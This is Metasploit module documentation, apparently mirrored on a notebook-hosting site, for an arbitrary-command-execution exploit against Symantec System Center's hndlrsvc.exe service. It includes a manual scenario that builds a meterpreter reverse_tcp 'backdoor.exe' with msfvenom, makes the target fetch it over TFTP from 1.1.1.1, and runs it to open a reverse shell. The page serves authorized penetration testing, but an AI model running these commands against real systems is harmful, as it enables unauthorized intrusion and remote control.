Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md
Views: 11789
Vulnerable Application
This module exploits Symantec System Center's alert management system (hndlrsvc.exe) with an arbitrary command execution. The payload is uploaded via TFTP and then executed on the system. This is part of Symantec AntiVirus Corporate Edition 8.0-10.1.7
Verification Steps
Install the application
Start msfconsole
Do:
use exploit/windows/antivirus/ams_hndlrsvc
Do:
set rhost
Do:
exploit
You should get a shell.
Options
CMD
Optional command line to run instead of attempting to directly inject a payload
RPORT
The port the service is running on. Default is 38292.
Scenarios
Manual Upload and Execute
If the module doesn't work for a shell, it's possible to run the CMD twice to emulate the steps the module takes.
start atftpd:
atftpd --daemon --port=69 /tftpboot/
create payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 lport=4444 -f exe -o /tftpboot/backdoor.exe
start metasploit
start a multihandler
load the module:
use exploit/windows/antivirus/ams_hndlrsvc
use ams:
set CMD 'tftp -i 1.1.1.1 GET backdoor.exe'
run
use ams:
set cmd 'backdoor.exe'
run